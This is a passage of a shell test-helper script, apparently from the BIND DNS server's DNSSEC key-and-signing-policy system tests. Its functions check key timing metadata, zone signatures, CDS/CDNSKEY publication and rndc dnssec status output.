${_private_file} (expected ${_published})" + fi + if [ "$_legacy" = "no" ]; then + grep "Published: $_published" "${_state_file}" > /dev/null || _log_error "mismatch publish in ${_state_file} (expected ${_published})" + fi + fi + + if [ "$_syncpublish" = "none" ]; then + grep "; SyncPublish:" "${_key_file}" > /dev/null && _log_error "unexpected syncpublish comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "SyncPublish:" "${_private_file}" > /dev/null && _log_error "unexpected syncpublish in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "PublishCDS: " "${_state_file}" > /dev/null && _log_error "unexpected syncpublish in ${_state_file}" + fi + else + grep "; SyncPublish: $_syncpublish" "${_key_file}" > /dev/null || _log_error "mismatch syncpublish comment in ${_key_file} (expected ${_syncpublish})" + if [ "$_private" = "yes" ]; then + grep "SyncPublish: $_syncpublish" "${_private_file}" > /dev/null || _log_error "mismatch syncpublish in ${_private_file} (expected ${_syncpublish})" + fi + if [ "$_legacy" = "no" ]; then + grep "PublishCDS: $_syncpublish" "${_state_file}" > /dev/null || _log_error "mismatch syncpublish in ${_state_file} (expected ${_syncpublish})" + fi + fi + + if [ "$_active" = "none" ]; then + grep "; Activate:" "${_key_file}" > /dev/null && _log_error "unexpected active comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Activate:" "${_private_file}" > /dev/null && _log_error "unexpected active in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Active: " "${_state_file}" > /dev/null && _log_error "unexpected active in ${_state_file}" + fi + else + grep "; Activate: $_active" "${_key_file}" > /dev/null || _log_error "mismatch active comment in ${_key_file} (expected ${_active})" + if [ "$_private" = "yes" ]; then + grep "Activate: $_active" "${_private_file}" > /dev/null || _log_error "mismatch active in ${_private_file} (expected ${_active})" + fi + if [ "$_legacy" = "no" ]; then + grep "Active: $_active" "${_state_file}" > /dev/null || _log_error "mismatch active in ${_state_file} (expected ${_active})" + fi + fi + + if [ "$_retired" = "none" ]; then + grep "; Inactive:" "${_key_file}" > /dev/null && _log_error "unexpected retired comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Inactive:" "${_private_file}" > /dev/null && _log_error "unexpected retired in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Retired: " "${_state_file}" > /dev/null && _log_error "unexpected retired in ${_state_file}" + fi + else + grep "; Inactive: $_retired" "${_key_file}" > /dev/null || _log_error "mismatch retired comment in ${_key_file} (expected ${_retired})" + if [ "$_private" = "yes" ]; then + grep "Inactive: $_retired" "${_private_file}" > /dev/null || _log_error "mismatch retired in ${_private_file} (expected ${_retired})" + fi + if [ "$_legacy" = "no" ]; then + grep "Retired: $_retired" "${_state_file}" > /dev/null || _log_error "mismatch retired in ${_state_file} (expected ${_retired})" + fi + fi + + if [ "$_revoked" = "none" ]; then + grep "; Revoke:" "${_key_file}" > /dev/null && _log_error "unexpected revoked comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Revoke:" "${_private_file}" > /dev/null && _log_error "unexpected revoked in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Revoked: " "${_state_file}" > /dev/null && _log_error "unexpected revoked in ${_state_file}" + fi + else + grep "; Revoke: $_revoked" "${_key_file}" > /dev/null || _log_error "mismatch revoked comment in ${_key_file} (expected ${_revoked})" + if [ "$_private" = "yes" ]; then + grep "Revoke: $_revoked" "${_private_file}" > /dev/null || _log_error "mismatch revoked in ${_private_file} (expected ${_revoked})" + fi + if [ "$_legacy" = "no" ]; then + grep "Revoked: $_revoked" "${_state_file}" > /dev/null || _log_error "mismatch revoked in ${_state_file} (expected ${_revoked})" + fi + fi + + if [ "$_removed" = "none" ]; then + grep "; Delete:" "${_key_file}" > /dev/null && _log_error "unexpected removed comment in ${_key_file}" + if [ "$_private" = "yes" ]; then + grep "Delete:" "${_private_file}" > /dev/null && _log_error "unexpected removed in ${_private_file}" + fi + if [ "$_legacy" = "no" ]; then + grep "Removed: " "${_state_file}" > /dev/null && _log_error "unexpected removed in ${_state_file}" + fi + else + grep "; Delete: $_removed" "${_key_file}" > /dev/null || _log_error "mismatch removed comment in ${_key_file} (expected ${_removed})" + if [ "$_private" = "yes" ]; then + grep "Delete: $_removed" "${_private_file}" > /dev/null || _log_error "mismatch removed in ${_private_file} (expected ${_removed})" + fi + if [ "$_legacy" = "no" ]; then + grep "Removed: $_removed" "${_state_file}" > /dev/null || _log_error "mismatch removed in ${_state_file} (expected ${_removed})" + fi + fi + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +check_keytimes() { + # The script relies on Python to set keytimes. + if [ -x "$PYTHON" ]; then + + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY1" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY2" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY3" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + check_timingmetadata "KEY4" + fi + fi +} + +# Check the key with key id $1 and see if it is unused. +# This requires environment variables to be set. +# +# This will set the following environment variables for testing: +# BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" +# KEY_FILE="${BASE_FILE}.key" +# PRIVATE_FILE="${BASE_FILE}.private" +# STATE_FILE="${BASE_FILE}.state" +# KEY_ID=$(echo $1 | sed 's/^0\{0,4\}//') +key_unused() { + _dir=$DIR + _zone=$ZONE + _key_idpad=$1 + _key_id=$(echo "$_key_idpad" | sed 's/^0\{0,4\}//') + _alg_num=$2 + _alg_numpad=$(printf "%03d" "$_alg_num") + + BASE_FILE="${_dir}/K${_zone}.+${_alg_numpad}+${_key_idpad}" + KEY_FILE="${BASE_FILE}.key" + PRIVATE_FILE="${BASE_FILE}.private" + STATE_FILE="${BASE_FILE}.state" + KEY_ID="${_key_id}" + + test $_log -eq 1 && echo_i "key unused $KEY_ID?" + + # Check file existence. + [ -s "$KEY_FILE" ] || ret=1 + [ -s "$PRIVATE_FILE" ] || ret=1 + [ -s "$STATE_FILE" ] || ret=1 + [ "$ret" -eq 0 ] || return + + # Treat keys that have been removed from the zone as unused. + _check_removed=1 + grep "; Created:" "$KEY_FILE" > created.key-${KEY_ID}.test${n} || _check_removed=0 + grep "; Delete:" "$KEY_FILE" > unused.key-${KEY_ID}.test${n} || _check_removed=0 + if [ "$_check_removed" -eq 1 ]; then + _created=$(awk '{print $3}' < created.key-${KEY_ID}.test${n}) + _removed=$(awk '{print $3}' < unused.key-${KEY_ID}.test${n}) + [ "$_removed" -le "$_created" ] && return + fi + + # If no timing metadata is set, this key is unused. + grep "; Publish:" "$KEY_FILE" > /dev/null && _log_error "unexpected publish comment in $KEY_FILE" + grep "; Activate:" "$KEY_FILE" > /dev/null && _log_error "unexpected active comment in $KEY_FILE" + grep "; Inactive:" "$KEY_FILE" > /dev/null && _log_error "unexpected retired comment in $KEY_FILE" + grep "; Revoke:" "$KEY_FILE" > /dev/null && _log_error "unexpected revoked comment in $KEY_FILE" + grep "; Delete:" "$KEY_FILE" > /dev/null && _log_error "unexpected removed comment in $KEY_FILE" + + grep "Publish:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected publish in $PRIVATE_FILE" + grep "Activate:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected active in $PRIVATE_FILE" + grep "Inactive:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected retired in $PRIVATE_FILE" + grep "Revoke:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected revoked in $PRIVATE_FILE" + grep "Delete:" "$PRIVATE_FILE" > /dev/null && _log_error "unexpected removed in $PRIVATE_FILE" + + grep "Published: " "$STATE_FILE" > /dev/null && _log_error "unexpected publish in $STATE_FILE" + grep "Active: " "$STATE_FILE" > /dev/null && _log_error "unexpected active in $STATE_FILE" + grep "Retired: " "$STATE_FILE" > /dev/null && _log_error "unexpected retired in $STATE_FILE" + grep "Revoked: " "$STATE_FILE" > /dev/null && _log_error "unexpected revoked in $STATE_FILE" + grep "Removed: " "$STATE_FILE" > /dev/null && _log_error "unexpected removed in $STATE_FILE" +} + +# Test: dnssec-verify zone $1. +dnssec_verify() +{ + n=$((n+1)) + echo_i "dnssec-verify zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "$ZONE" "@${SERVER}" AXFR > dig.out.axfr.test$n || _log_error "dig ${ZONE} AXFR failed" + $VERIFY -z -o "$ZONE" dig.out.axfr.test$n > verify.out.$ZONE.test$n || _log_error "dnssec verify zone $ZONE failed" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Wait for the zone to be signed. +# The apex NSEC record indicates that it is signed. +_wait_for_nsec() { + _dig_with_opts "@${SERVER}" "$ZONE" NSEC > "dig.out.nsec.test$n" || return 1 + grep "NS SOA" "dig.out.nsec.test$n" > /dev/null || return 1 + grep "${ZONE}\..*IN.*RRSIG" "dig.out.nsec.test$n" > /dev/null || return 1 + return 0 +} +wait_for_nsec() { + n=$((n+1)) + ret=0 + echo_i "wait for ${ZONE} to be signed ($n)" + retry_quiet 10 _wait_for_nsec || _log_error "wait for ${ZONE} to be signed failed" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +check_numkeys() { + _numkeys=$(get_keyids "$DIR" "$ZONE" | wc -l) + test "$_numkeys" -eq "$NUM_KEYS" || return 1 + return 0 +} + +_check_keys() { + ret=0 + _ret=0 + + # Clear key ids. + key_set KEY1 ID "no" + key_set KEY2 ID "no" + key_set KEY3 ID "no" + key_set KEY4 ID "no" + + # Check key files. + _ids=$(get_keyids "$DIR" "$ZONE") + for _id in $_ids; do + # There are multiple key files with the same algorithm. + # Check them until a match is found. + ret=0 + echo_i "check key id $_id" + + if [ "no" = "$(key_get KEY1 ID)" ] && [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY1" "$_id" + test "$ret" -eq 0 && key_save KEY1 && continue + fi + if [ "no" = "$(key_get KEY2 ID)" ] && [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY2" "$_id" + test "$ret" -eq 0 && key_save KEY2 && continue + fi + if [ "no" = "$(key_get KEY3 ID)" ] && [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY3" "$_id" + test "$ret" -eq 0 && key_save KEY3 && continue + fi + if [ "no" = "$(key_get KEY4 ID)" ] && [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + ret=0 + check_key "KEY4" "$_id" + test "$ret" -eq 0 && key_save KEY4 && continue + fi + + # This may be an unused key. Assume algorithm of KEY1. + ret=0 && key_unused "$_id" "$(key_get KEY1 ALG_NUM)" + test "$ret" -eq 0 && continue + + # If ret is still non-zero, none of the files matched. + echo_i "failed" + _ret=1 + done + + return $_ret +} + +# Check keys for a configured zone. This verifies: +# 1. The right number of keys exist in the key pool ($1). +# 2. The right number of keys is active. Checks KEY1, KEY2, KEY3, and KEY4. +# +# It is expected that KEY1, KEY2, KEY3, and KEY4 arrays are set correctly. +# Found key identifiers are stored in the right key array. +check_keys() { + n=$((n+1)) + echo_i "check keys are created for zone ${ZONE} ($n)" + ret=0 + + echo_i "check number of keys for zone ${ZONE} in dir ${DIR} ($n)" + retry_quiet 10 check_numkeys || ret=1 + if [ $ret -ne 0 ]; then + _numkeys=$(get_keyids "$DIR" "$ZONE" | wc -l) + _log_error "bad number of key files ($_numkeys) for zone $ZONE (expected $NUM_KEYS)" + status=$((status+ret)) + fi + + # Temporarily don't log errors because we are searching multiple files. + disable_logerror + + retry_quiet 3 _check_keys || ret=1 + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # Turn error logs on again. + enable_logerror + + ret=0 + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + echo_i "KEY1 ID $(key_get KEY1 ID)" + test "no" = "$(key_get KEY1 ID)" && _log_error "No KEY1 found for zone ${ZONE}" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + echo_i "KEY2 ID $(key_get KEY2 ID)" + test "no" = "$(key_get KEY2 ID)" && _log_error "No KEY2 found for zone ${ZONE}" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + echo_i "KEY3 ID $(key_get KEY3 ID)" + test "no" = "$(key_get KEY3 ID)" && _log_error "No KEY3 found for zone ${ZONE}" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + echo_i "KEY4 ID $(key_get KEY4 ID)" + test "no" = "$(key_get KEY4 ID)" && _log_error "No KEY4 found for zone ${ZONE}" + fi + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Call rndc dnssec -status on server $1 for zone $3 in view $4 with policy $2 +# and check output. This is a loose verification, it just tests if the right +# policy name is returned, and if all expected keys are listed. The rndc +# dnssec -status output also lists whether a key is published, +# used for signing, is retired, or is removed, and if not when +# it is scheduled to do so, and it shows the states for the various +# DNSSEC records. +check_dnssecstatus() { + _server=$1 + _policy=$2 + _zone=$3 + _view=$4 + + n=$((n+1)) + echo_i "check rndc dnssec -status output for ${_zone} (policy: $_policy) ($n)" + ret=0 + + _rndccmd $_server dnssec -status $_zone in $_view > rndc.dnssec.status.out.$_zone.$n || _log_error "rndc dnssec -status zone ${_zone} failed" + + if [ "$_policy" = "none" ]; then + grep "Zone does not have dnssec-policy" rndc.dnssec.status.out.$_zone.$n > /dev/null || log_error "bad dnssec status for unsigned zone ${_zone}" + else + grep "dnssec-policy: ${_policy}" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "bad dnssec status for signed zone ${_zone}" + if [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY1 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY1 ID) from dnssec status" + fi + if [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY2 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY2 ID) from dnssec status" + fi + if [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY3 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY3 ID) from dnssec status" + fi + if [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + grep "key: $(key_get KEY4 ID)" rndc.dnssec.status.out.$_zone.$n > /dev/null || _log_error "missing key $(key_get KEY4 ID) from dnssec status" + fi + fi + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Call rndc zonestatus on server $1 for zone $2 in view $3 and check output if +# inline-signing is enabled. +check_inlinesigning() { + _server=$1 + _zone=$2 + _view=$3 + + _rndccmd $_server zonestatus $_zone in $_view > rndc.zonestatus.out.$_zone.$n || return 1 + grep "inline signing: yes" rndc.zonestatus.out.$_zone.$n > /dev/null || return 1 +} + +# Call rndc zonestatus on server $1 for zone $2 in view $3 and check output if +# the zone is dynamic. +check_isdynamic() { + _server=$1 + _zone=$2 + _view=$3 + + _rndccmd $_server zonestatus $_zone in $_view > rndc.zonestatus.out.$_zone.$n || return 1 + grep "dynamic: yes" rndc.zonestatus.out.$_zone.$n > /dev/null || return 1 +} + +# Check if RRset of type $1 in file $2 is signed with the right keys. +# The right keys are the ones that expect a signature and matches the role $3. +_check_signatures() { + _qtype=$1 + _file=$2 + _role=$3 + + numsigs=0 + + if [ "$_role" = "KSK" ]; then + _expect_type=EXPECT_KRRSIG + elif [ "$_role" = "ZSK" ]; then + _expect_type=EXPECT_ZRRSIG + fi + + if [ "$(key_get KEY1 "$_expect_type")" = "yes" ] && [ "$(key_get KEY1 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY1 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY1 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY2 "$_expect_type")" = "yes" ] && [ "$(key_get KEY2 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY2 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY2 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY3 "$_expect_type")" = "yes" ] && [ "$(key_get KEY3 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY3 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY3 ID)$" > /dev/null && return 1 + fi + + if [ "$(key_get KEY4 "$_expect_type")" = "yes" ] && [ "$(key_get KEY4 "$_role")" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY4 ID)$" > /dev/null || return 1 + numsigs=$((numsigs+1)) + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + get_keys_which_signed "$_qtype" "$_file" | grep "^$(key_get KEY4 ID)$" > /dev/null && return 1 + fi + + lines=$(get_keys_which_signed "${_qtype}" "${_file}" | wc -l) + test "$lines" -eq "$numsigs" || echo_i "bad number of signatures for $_qtype (got $lines, expected $numsigs)" + test "$lines" -eq "$numsigs" || return 1 + + return 0 +} +check_signatures() { + retry_quiet 3 _check_signatures $1 $2 $3 || _log_error "RRset $1 in zone $ZONE incorrectly signed" +} + +response_has_cds_for_key() ( + awk -v zone="${ZONE%%.}." \ + -v ttl="${DNSKEY_TTL}" \ + -v qtype="CDS" \ + -v keyid="$(key_get "${1}" ID)" \ + -v keyalg="$(key_get "${1}" ALG_NUM)" \ + -v hashalg="2" \ + 'BEGIN { ret=1; } + $1 == zone && $2 == ttl && $4 == qtype && $5 == keyid && $6 == keyalg && $7 == hashalg { ret=0; exit; } + END { exit ret; }' \ + "$2" +) + +response_has_cdnskey_for_key() ( + + awk -v zone="${ZONE%%.}." \ + -v ttl="${DNSKEY_TTL}" \ + -v qtype="CDNSKEY" \ + -v flags="$(key_get "${1}" FLAGS)" \ + -v keyalg="$(key_get "${1}" ALG_NUM)" \ + 'BEGIN { ret=1; } + $1 == zone && $2 == ttl && $4 == qtype && $5 == flags && $7 == keyalg { ret=0; exit; } + END { exit ret; }' \ + "$2" +) + +# Test CDS and CDNSKEY publication. +check_cds() { + + n=$((n+1)) + echo_i "check CDS and CDNSKEY rrset are signed correctly for zone ${ZONE} ($n)" + ret=0 + + _checksig=0 + + _dig_with_opts "$ZONE" "@${SERVER}" "CDS" > "dig.out.$DIR.test$n.cds" || _log_error "dig ${ZONE} CDS failed" + grep "status: NOERROR" "dig.out.$DIR.test$n.cds" > /dev/null || _log_error "mismatch status in DNS response" + + _dig_with_opts "$ZONE" "@${SERVER}" "CDNSKEY" > "dig.out.$DIR.test$n.cdnskey" || _log_error "dig ${ZONE} CDNSKEY failed" + grep "status: NOERROR" "dig.out.$DIR.test$n.cdnskey" > /dev/null || _log_error "mismatch status in DNS response" + + if [ "$CDS_DELETE" = "no" ]; then + grep "CDS.*0 0 0 00" "dig.out.$DIR.test$n.cds" > /dev/null && _log_error "unexpected CDS DELETE record in DNS response" + grep "CDNSKEY.*0 3 0 AA==" "dig.out.$DIR.test$n.cdnskey" > /dev/null && _log_error "unexpected CDNSKEY DELETE record in DNS response" + else + grep "CDS.*0 0 0 00" "dig.out.$DIR.test$n.cds" > /dev/null || _log_error "missing CDS DELETE record in DNS response" + grep "CDNSKEY.*0 3 0 AA==" "dig.out.$DIR.test$n.cdnskey" > /dev/null || _log_error "missing CDNSKEY DELETE record in DNS response" + _checksig=1 + fi + + if [ "$(key_get KEY1 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY1 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY1 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY1 ID)" + response_has_cdnskey_for_key KEY1 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY1 ID)" + _checksig=1 + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY1 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY1 ID)" + # KEY1 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + if [ "$(key_get KEY2 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY2 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY2 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY2 ID)" + response_has_cdnskey_for_key KEY2 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY2 ID)" + _checksig=1 + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY2 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY2 ID)" + # KEY2 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + if [ "$(key_get KEY3 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY3 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY3 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY3 ID)" + response_has_cdnskey_for_key KEY3 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY3 ID)" + _checksig=1 + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY3 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY3 ID)" + # KEY3 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + if [ "$(key_get KEY4 STATE_DS)" = "rumoured" ] || [ "$(key_get KEY4 STATE_DS)" = "omnipresent" ]; then + response_has_cds_for_key KEY4 "dig.out.$DIR.test$n.cds" || _log_error "missing CDS record in response for key $(key_get KEY4 ID)" + response_has_cdnskey_for_key KEY4 "dig.out.$DIR.test$n.cdnskey" || _log_error "missing CDNSKEY record in response for key $(key_get KEY4 ID)" + _checksig=1 + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + response_has_cds_for_key KEY4 "dig.out.$DIR.test$n.cds" && _log_error "unexpected CDS record in response for key $(key_get KEY4 ID)" + # KEY4 should not have an associated CDNSKEY, but there may be + # one for another key. Since the CDNSKEY has no field for key + # id, it is hard to check what key the CDNSKEY may belong to + # so let's skip this check for now. + fi + + test "$_checksig" -eq 0 || check_signatures "CDS" "dig.out.$DIR.test$n.cds" "KSK" + test "$_checksig" -eq 0 || check_signatures "CDNSKEY" "dig.out.$DIR.test$n.cdnskey" "KSK" + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +_find_dnskey() { + _owner="${ZONE}." + _alg="$(key_get $1 ALG_NUM)" + _flags="$(key_get $1 FLAGS)" + _key_file="$(key_get $1 BASEFILE).key" + + awk '$1 == "'"$_owner"'" && $2 == "'"$DNSKEY_TTL"'" && $3 == "IN" && $4 == "DNSKEY" && $5 == "'"$_flags"'" && $6 == "3" && $7 == "'"$_alg"'" { print $8 }' < "$_key_file" +} + + +# Test DNSKEY query. +_check_apex_dnskey() { + _dig_with_opts "$ZONE" "@${SERVER}" "DNSKEY" > "dig.out.$DIR.test$n" || return 1 + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || return 1 + + _checksig=0 + + if [ "$(key_get KEY1 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY1 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY1) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY1 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY1) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY2 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY2 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY2) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY2 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY2) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY3 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY3 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY3) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY3 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY3) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + if [ "$(key_get KEY4 STATE_DNSKEY)" = "rumoured" ] || [ "$(key_get KEY4 STATE_DNSKEY)" = "omnipresent" ]; then + _pubkey=$(_find_dnskey KEY4) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null || return 1 + _checksig=1 + elif [ "$(key_get KEY4 EXPECT)" = "yes" ]; then + _pubkey=$(_find_dnskey KEY4) + test -z "$_pubkey" && return 1 + grep -F "$_pubkey" "dig.out.$DIR.test$n" > /dev/null && return 1 + fi + + test "$_checksig" -eq 0 && return 0 + + _check_signatures "DNSKEY" "dig.out.$DIR.test$n" "KSK" || return 1 + + return 0 +} + +# Test the apex of a configured zone. This checks that the SOA and DNSKEY +# RRsets are signed correctly and with the appropriate keys. +check_apex() { + + # Test DNSKEY query. + n=$((n+1)) + echo_i "check DNSKEY rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + retry_quiet 10 _check_apex_dnskey || ret=1 + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # We retry the DNSKEY query for at most ten seconds to avoid test + # failures due to timing issues. If the DNSKEY query check passes this + # means the zone is resigned and further apex checks (SOA, CDS, CDNSKEY) + # don't need to be retried quietly. + + # Test SOA query. + n=$((n+1)) + echo_i "check SOA rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "$ZONE" "@${SERVER}" "SOA" > "dig.out.$DIR.test$n" || _log_error "dig ${ZONE} SOA failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || _log_error "mismatch status in DNS response" + grep "${ZONE}\..*${DEFAULT_TTL}.*IN.*SOA.*" "dig.out.$DIR.test$n" > /dev/null || _log_error "missing SOA record in response" + check_signatures "SOA" "dig.out.$DIR.test$n" "ZSK" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) + + # Test CDS and CDNSKEY publication. + check_cds +} + +# Test an RRset below the apex and verify it is signed correctly. +check_subdomain() { + _qtype="A" + n=$((n+1)) + echo_i "check ${_qtype} a.${ZONE} rrset is signed correctly for zone ${ZONE} ($n)" + ret=0 + _dig_with_opts "a.$ZONE" "@${SERVER}" $_qtype > "dig.out.$DIR.test$n" || _log_error "dig a.${ZONE} ${_qtype} failed" + grep "status: NOERROR" "dig.out.$DIR.test$n" > /dev/null || _log_error "mismatch status in DNS response" + grep "a.${ZONE}\..*${DEFAULT_TTL}.*IN.*${_qtype}.*10\.0\.0\.1" "dig.out.$DIR.test$n" > /dev/null || _log_error "missing a.${ZONE} ${_qtype} record in response" + lines=$(get_keys_which_signed $_qtype "dig.out.$DIR.test$n" | wc -l) + check_signatures $_qtype "dig.out.$DIR.test$n" "ZSK" + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Check if "CDS/CDNSKEY Published" is logged. +check_cdslog() { + _dir=$1 + _zone=$2 + _key=$3 + + _alg=$(key_get $_key ALG_STR) + _id=$(key_get $_key ID) + + n=$((n+1)) + echo_i "check CDS/CDNSKEY publication is logged in ${_dir}/named.run for key ${_zone}/${_alg}/${_id} ($n)" + ret=0 + + grep "CDS for key ${_zone}/${_alg}/${_id} is now published" "${_dir}/named.run" > /dev/null || ret=1 + grep "CDNSKEY for key ${_zone}/${_alg}/${_id} is now published" "${_dir}/named.run" > /dev/null || ret=1 + + test "$ret" -eq 0 || echo_i "failed" + status=$((status+ret)) +} + +# Tell named that the DS for the key in given zone has been seen in the +# parent (this does not actually has to be true, we just issue the command +# to make named believe it can continue with the rollover). +rndc_checkds() { + _server=$1 + _dir=$2 + _key=$3 + _when=$4 + _what=$5 + _zone=$6 + _view=$7 + + _keycmd="" + if [ "${_key}" != "-" ]; then + _keyid=$(key_get $_key ID) + _keycmd=" -key ${_keyid}" + fi + + _whencmd="" + if [ "${_when}" != "now" ]; then + _whencmd=" -when ${_when}" + fi + + n=$((n+1)) + echo_i "calling rndc dnssec -checkds${_keycmd}${_whencmd} ${_what} zone ${_zone} in ${_view} ($n)" + ret=0 + + _rndccmd $_server dnssec -checkds $_keycmd $_whencmd $_what $_zone in $_view > rndc.dnssec.checkds.out.$_zone.$n || _log_error "rndc 